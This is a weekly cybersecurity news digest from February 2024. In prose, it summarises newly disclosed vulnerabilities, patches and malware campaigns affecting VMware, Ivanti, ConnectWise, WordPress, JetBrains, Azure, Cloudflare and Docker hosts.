02/14/2024-02/21/2024 VMware Alert, New Malicious PyPI Packages,Critical Flaws in ConnectWise ScreenConnect Software And More.

1. VMware Alert: Uninstall EAP Now – Critical Flaw Puts Active Directory at Risk

VMware advises uninstalling the deprecated Enhanced Authentication Plugin (EAP) due to a critical security flaw (CVE-2024-22245, CVSS score: 9.6), described as an arbitrary authentication relay bug. This flaw could enable a malicious actor to manipulate service tickets for arbitrary Active Directory Service Principal Names (SPNs) through a user’s browser. Also discovered is a session hijack flaw (CVE-2024-22250, CVSS score: 7.8) in EAP, allowing a local actor to seize a privileged session. Users connecting to VMware vSphere via the vSphere Client on Windows systems may be affected. VMware will not patch these flaws, recommending complete removal of the plugin. Meanwhile, SonarSource disclosed cross-site scripting (XSS) flaws in Joomla! (CVE-2024-21726), addressed in versions 5.0.3 and 4.4.3, posing a moderate threat.

2. New Malicious PyPI Packages Caught Using Covert Side-Loading

TacticsCybersecurity researchers found two malicious packages on PyPI using DLL side-loading to evade detection and execute harmful code. Named NP6HelperHttptest and NP6HelperHttper, they were downloaded 537 and 166 times before removal. This discovery underscores the expanding threat of software supply chain attacks. The NP6 reference connects to a legitimate ChapsVision marketing solution, with the fake packages mimicking legitimate tools NP6HelperHttp and NP6HelperConfig. Their goal is to deceive developers into downloading rogue versions. These packages contain a setup.py script designed to download an executable vulnerable to DLL side-loading (“ComServer.exe”) and a malicious DLL (“dgdeskband64.dll”). The DLL aims to avoid detection, similar to previous cases like the npm package “aabquerys,” which deployed a remote access trojan. It communicates with an attacker-controlled domain to fetch malicious code, potentially part of a broader campaign targeting supply chain security in open-source repositories.

3. Critical Flaws Found in ConnectWise ScreenConnect Software – Patch Now

ConnectWise issued updates for its ScreenConnect remote desktop software to fix two security flaws, one critical allowing remote code execution. The vulnerabilities, lacking CVE identifiers, include authentication bypass (CVSS: 10.0) and path traversal (CVSS: 8.4). These critical issues affect versions 23.9.7 and below, with fixes in version 23.9.8, reported on February 13, 2024. Although no exploitation evidence exists, self-hosted users are urged to update. ConnectWise will provide updates for versions 22.4 through 23.9.7, but recommends version 23.9.8. Huntress found over 8,800 vulnerable servers and demonstrated an exploit bypassing authentication, emphasizing the need for immediate action.

4. WordPress Bricks Theme Under Active Attack: Critical Flaw Impacts 25,000+ Sites

The Bricks WordPress theme suffers a critical flaw (CVE-2024-25600, CVSS: 9.8) exploited for remote code execution by unauthenticated attackers. Versions up to 1.9.6 are vulnerable, fixed in 1.9.6.1 released on February 13, 2024. The flaw, reported by Snicco on February 10, involves a nonce-related vulnerability in the prepare_query_vars_from_settings() function. Attack attempts started on February 14, with over three dozen detected by Wordfence. The flaw exposes around 25,000 active installations. Users should promptly update to mitigate risks.

5. Ivanti Pulse Secure Found Using 11-Year-Old Linux Version and Outdated Libraries

A firmware analysis of Ivanti Pulse Secure appliances uncovered significant vulnerabilities, highlighting the ongoing challenge of securing software supply chains. The firmware, based on unsupported CentOS 6.4, exposes outdated Linux components dating back over a decade. Threat actors exploit these weaknesses, targeting Ivanti Connect Secure, Policy Secure, and ZTA gateways with various malware. Active exploits include CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893, with Akamai reporting heightened scanning activity for CVE-2024-22024. Exploiting CVE-2024-21893, Eclypsium gained access to the appliance, revealing outdated packages and vulnerable libraries. Notably, Perl remains at version 5.6.1 from 2001, and the Linux kernel at 2.6.32, posing significant risks. Additionally, Ivanti’s Integrity Checker Tool (ICT) exhibits flaws, potentially allowing attackers to bypass detection. Eclypsium emphasizes the need for transparent validation processes to bolster supply chain security amid increasing exploitation attempts. 

02/07/2024-02/14/2024 Ivanti Vulnerability, CISA and OpenSSF Release Framework, New Ivanti Auth Bypass Flaw And More.

1. Ivanti Vulnerability Exploited to Install ‘DSLog’ Backdoor on 670+ IT Infrastructures

Threat actors are exploiting a recent security flaw in Ivanti Connect Secure, Policy Secure, and ZTA gateways to deploy a backdoor named DSLog. Orange Cyberdefense noted the exploitation of CVE-2024-21893 shortly after the proof-of-concept code was released. This vulnerability, disclosed alongside CVE-2024-21888, allows server-side request forgery (SSRF), potentially granting unauthorized access to restricted resources. Ivanti confirmed limited targeted attacks, but the scale remains uncertain. Shadowserver Foundation reported a surge in exploitation attempts from over 170 IP addresses. Compromises have been detected since February 3, with attackers injecting DSLog into a Perl file for persistent remote access. DSLog uses unique hashes per appliance, complicating detection. Attackers use the hash in HTTP requests to execute commands. They also erase “.access” logs to evade detection. Orange Cyberdefense identified 670 compromised assets initially, decreasing to 524 by February 7, by analyzing artifacts triggered by the SSRF vulnerability.

2. CISA and OpenSSF Release Framework for Package Repository Security

CISA is collaborating with the Open Source Security Foundation (OpenSSF) to release a framework named Principles for Package Repository Security. This framework, developed by OpenSSF’s Securing Software Repositories Working Group, aims to fortify package repositories and enhance security in open-source software ecosystems. It introduces four security maturity levels covering authentication, authorization, general capabilities, and command-line interface (CLI) tooling. The levels range from basic security measures like multi-factor authentication (MFA) to advanced protocols such as requiring MFA for all maintainers and supporting package build provenance. All package management ecosystems should strive for at least Level 1 security. The framework enables package repositories to assess their security maturity and implement necessary improvements over time to combat evolving security threats effectively. 

3. Warning: New Ivanti Auth Bypass Flaw Affects Connect Secure and ZTA Gateways

Ivanti warns of a critical security flaw (CVE-2024-22024) affecting Connect Secure, Policy Secure, and ZTA gateway devices, potentially enabling authentication bypass. The vulnerability, rated 8.3 out of 10 on the CVSS scale, stems from an XML external entity (XXE) issue in the SAML component. Versions affected include Connect Secure 9.x, 22.x, Policy Secure 9.x, 22.x, and ZTA 22.x. Patch updates are available for affected versions. While there’s no evidence of active exploitation, given the recent abuse of similar vulnerabilities, users are urged to apply patches promptly. The flaw was brought to Ivanti’s attention by cybersecurity firm watchTowr, highlighting potential impacts such as denial of service (DOS), local file read, and server-side request forgery (SSRF), contingent on available protocols.

4. Critical Patches Released for New Flaws in Cisco, Fortinet, VMware Products

Cisco, Fortinet, and VMware have issued security patches for various vulnerabilities, including critical ones enabling arbitrary actions on affected devices. Cisco disclosed three flaws (CVE-2024-20252, CVE-2024-20254, CVE-2024-20255) in Expressway Series, allowing CSRF attacks. Exploitation could lead to unauthorized actions, including modifying configurations. Fortinet addressed bypasses for a critical FortiSIEM supervisor flaw (CVE-2023-34992) with two new vulnerabilities (CVE-2024-23108, CVE-2024-23109), allowing remote code execution. VMware reported five moderate-to-important flaws in Aria Operations for Networks, involving local privilege escalation and cross-site scripting vulnerabilities. Upgrading to specified versions mitigates risks across all platforms.

5. DarkMe Malware Targets Traders Using Microsoft SmartScreen Zero-Day Vulnerability

A zero-day vulnerability in Microsoft Defender SmartScreen has been exploited by an advanced persistent threat group known as Water Hydra (aka DarkCasino), targeting financial traders. Trend Micro discovered the campaign in December 2023, involving CVE-2024-21412, a security bypass flaw in Internet Shortcut Files (.URL). This flaw bypasses SmartScreen to deliver the DarkMe malware. Microsoft patched it in February. The attack requires convincing the victim to click on a booby-trapped URL to download a malicious installer. The technique abuses the search: application protocol, delivering malware via layered internet shortcut files to evade SmartScreen. The end goal is to deploy DarkMe, a Visual Basic trojan, allowing remote control and data exfiltration. This trend of cybercrime groups exploiting zero-days reflects their increasing sophistication. Water Hydra demonstrates the capability to discover and exploit zero-days, indicating a merging of cybercrime and nation-state hacking tactics.

6.  Microsoft Rolls Out Patches for 73 Flaws, Including 2 Windows Zero-Days

Microsoft’s February Patch Tuesday addresses 73 security flaws, including two zero-days exploited by Water Hydra targeting financial traders. Notably, CVE-2024-21351 and CVE-2024-21412 allow code injection into SmartScreen and bypassing security checks, respectively. Successful exploitation requires convincing users to open malicious files. Water Hydra exploits CVE-2024-21412 in a zero-day attack chain. The update also covers five critical flaws, including remote code execution vulnerabilities in Microsoft Exchange Server and Outlook. CVE-2023-50387, a 24-year-old design flaw in DNSSEC, is also patched, named KeyTrap, capable of causing denial-of-service attacks. Users are urged to apply patches promptly to mitigate risks.

.

01/31/2024-02/07/2024 Critical JetBrains Security Flaw, New Flaws in Azure, Cloudflare Breach And More.

1. Critical JetBrains TeamCity On-Premises Flaw Exposes Servers to Takeover – Patch Now

JetBrains warns of a critical security flaw (CVE-2024-23917) in its TeamCity On-Premises software, scoring 9.8 out of 10 on the CVSS scale. This flaw could allow threat actors to seize control of vulnerable instances. Attackers with HTTP(S) access might bypass authentication and gain administrative control. The vulnerability affects versions from 2017.1 to 2023.11.2, fixed in 2023.11.3. Discovered by an external researcher on January 19, 2024, users can apply a security patch plugin if unable to update. JetBrains suggests temporarily blocking public access for servers unable to update immediately. While there’s no known exploitation, a similar flaw (CVE-2023-42793) saw active exploitation by ransomware gangs and state-sponsored groups after disclosure last year.

2. Experts Detail New Flaws in Azure HDInsight Spark, Kafka, and Hadoop Services

Three security vulnerabilities in Azure HDInsight’s Apache Hadoop, Kafka, and Spark services allow privilege escalation and a regular expression denial-of-service (ReDoS).

Orca security researcher Lidor Ben Shitrit reported the flaws, including:

• CVE-2023-36419 (CVSS: 8.8) – Apache Oozie XXE Injection Elevation of Privilege;
• CVE-2023-38156 (CVSS: 7.2) – Apache Ambari JDBC Injection Elevation of Privilege;
• Apache Oozie ReDoS Vulnerability.

Attackers could exploit privilege escalation flaws to gain administrator privileges by crafting network requests. The XXE flaw permits root-level file reading and privilege escalation, while the JDBC injection flaw facilitates obtaining a reverse shell as root. The ReDoS vulnerability arises from inadequate input validation, enabling attackers to trigger a denial-of-service by causing an intensive loop operation. Microsoft has released fixes on October 26, 2023, following responsible disclosure. Exploitation could disrupt system operations, degrade performance, and impact service availability and reliability.

3. Recent SSRF Flaw in Ivanti VPN Products Undergoes Mass Exploitation

The Ivanti Connect Secure and Policy Secure products face mass exploitation of a disclosed SSRF vulnerability (CVE-2024-21893, CVSS: 8.2), allowing unauthorized access to restricted resources. Shadowserver Foundation noted over 170 IP addresses attempting to establish a reverse shell. The flaw, also affecting Neurons for ZTA, enables attackers to bypass authentication. Exploitation has surged since a proof-of-concept (PoC) exploit by Rapid7. Combining it with a previously patched command injection flaw (CVE-2024-21887), unauthenticated remote code execution is achieved. Notably, CVE-2024-21893 (alias CVE-2023-36661) is in the Shibboleth XMLTooling library, fixed in June 2023. Additionally, Ivanti VPN appliances use outdated open-source components, exposing vulnerabilities. Ivanti has released a second mitigation and begun patching officially. Threat actors exploit CVE-2023-46805 and CVE-2024-21887 for deploying custom web shells named BUSHWALK, CHAINLINE, FRAMESTING, and LIGHTWIRE, as revealed by Mandiant.

4. Cloudflare Breach: Nation-State Hackers Access Source Code and Internal Docs

Cloudflare discloses a likely nation-state attack, revealing unauthorized access to its Atlassian server, leading to document and source code exposure between November 14 and 24, 2023. The sophisticated actor aimed to persistently infiltrate Cloudflare’s network. In response, Cloudflare rotated over 5,000 production credentials, segmented systems, and conducted forensic triage on 4,893 systems. During the four-day reconnaissance period, the attacker accessed Atlassian Confluence and Jira portals, then established persistent access, ultimately accessing 120 code repositories, of which 76 were exfiltrated. Repositories pertained to backups, network configuration, identity management, remote access, and infrastructure management tools. The attacker unsuccessfully tried to breach a console server in São Paulo. Stolen credentials from Okta’s support system, including AWS and Atlassian, facilitated the intrusion. Cloudflare failed to rotate these credentials promptly but terminated malicious connections on November 24, 2023, and engaged CrowdStrike for an independent assessment.

5. FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network

The FritzFrog threat actor has reemerged with a new variant utilizing the Log4Shell vulnerability to spread within compromised networks. Akamai reports brute-force exploitation targeting vulnerable Java applications. Initially focusing on weak SSH credentials, FritzFrog has expanded its targets to healthcare, education, and government sectors, deploying cryptocurrency miners. Unlike prior versions, the latest version targets internal hosts, leveraging unpatched systems. This shift exploits neglected internal machines, increasing infection risks. FritzFrog enhances its SSH brute-force tactic and utilizes CVE-2021-4034 for local privilege escalation. To evade detection, it avoids dropping files to disk, utilizing /dev/shm and memfd_create for memory-resident payloads. This strategy mirrors techniques used by other Linux-based malware.

6. Exposed Docker APIs Under Attack in ‘Commando Cat’ Cryptojacking Campaign

Docker API endpoints face a cryptojacking campaign named Commando Cat, deploying benign containers via the Commando project. Active since 2024, it’s the second such campaign within months. Targeting Docker hosts, it deploys XMRig and 9Hits Viewer. Commando Cat breaches Docker instances to execute payloads, including backdoors and miners. It checks for specific active services before proceeding. Payloads are delivered from the C2 server, adding SSH keys, creating rogue users, and exfiltrating credentials. Using curl or wget, payloads are fetched and executed, with /dev/shm used for evasion. Forensics are complicated as artifacts avoid disk touch. The attack concludes with a Base64-encoded script deploying XMRig after eliminating competing miners.